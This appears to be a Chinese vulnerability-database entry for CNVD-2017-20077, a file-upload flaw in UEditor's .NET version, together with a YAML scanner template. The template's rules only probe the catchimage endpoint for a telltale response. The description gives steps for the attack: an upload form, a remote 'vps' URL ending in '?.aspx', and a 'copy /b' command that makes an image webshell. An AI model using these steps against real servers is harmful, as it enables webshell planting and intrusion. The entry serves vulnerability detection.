CNVD-2017-20077: Ueditor编辑器.net版本存在文件上传漏洞

日期: 2025-09-01 | 影响软件: UEditor编辑器 .net版本 | POC: 已公开

漏洞描述

<form action="http://8.8.8.8:8001/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST"> http://vps/11.jpg?.aspx 11.jpg是图片马;制作图片马:copy 1.jpg/b +2.aspx 3.aspx

PoC代码[已公开]

id: CNVD-2017-20077

info:
  name: Ueditor编辑器.net版本存在文件上传漏洞
  author: zan8in wuhua
  severity: critical
  description: |
    <form action="http://8.8.8.8:8001/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
    http://vps/11.jpg?.aspx 11.jpg是图片马;制作图片马:copy 1.jpg/b +2.aspx 3.aspx
  reference:
    - https://www.CNVD.org.cn/flaw/show/CNVD-2017-20077
    - https://zhuanlan.zhihu.com/p/85265552
    - https://www.freebuf.com/vuls/181814.html

rules:
  r0:
    request:
      method: GET
      path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8
      headers:
        Accept-Encoding: 'deflate'
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源")))
  r1:
    request:
      method: GET
      path: /js/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
      headers:
        Accept-Encoding: 'deflate'
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源")))
expression: r0() || r1()

相关漏洞推荐